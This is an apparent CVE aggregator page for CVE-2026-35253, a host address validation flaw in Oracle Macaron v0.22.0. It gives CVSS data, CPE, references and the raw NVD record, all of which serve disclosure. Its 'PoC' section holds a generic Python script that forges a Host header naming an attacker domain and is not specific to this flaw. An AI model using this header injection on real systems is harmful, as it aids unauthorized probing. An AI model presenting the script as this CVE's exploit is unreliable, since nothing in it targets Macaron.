CVE-2026-35253

Description

Vulnerability in the Oracle Macoron Tool product of Oracle Open Source Projects. The supported versions that is affected is v0.22.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Macaron Tool. Successful attacks of this vulnerability can result in Oracle Macaron Tool failing host address validation.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:macaron:0.22.0:*:*:*:*:*:*:* - VULNERABLE

Oracle Macaron Tool v0.22.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://example-vulnerable-app.com/api/endpoint"

# Malicious Host header to bypass validation or cause SSRF
malicious_headers = {
    "Host": "attacker-controlled-domain.com",
    "User-Agent": "CVE-2026-35253-POC"
}

try:
    # Send request with crafted headers
    response = requests.get(target_url, headers=malicious_headers, timeout=10)
    
    # Check response status and content
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response Content: {response.text[:200]}")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35253
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35253
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35253/
[4] VulDB https://vuldb.com/cve/CVE-2026-35253
[5] https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35253", "sourceIdentifier": "[email protected]", "published": "2026-05-06T08:16:03.570", "lastModified": "2026-05-12T19:10:53.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Macoron Tool product of Oracle Open Source Projects. The supported versions that is affected is v0.22.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Macaron Tool. Successful attacks of this vulnerability can result in Oracle Macaron Tool failing host address validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:macaron:0.22.0:*:*:*:*:*:*:*", "matchCriteriaId": "A4FA7633-EEE0-45F0-A83B-473403DF964E"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html", "source": "[email protected]", "tags": ["Not Applicable"]}]}}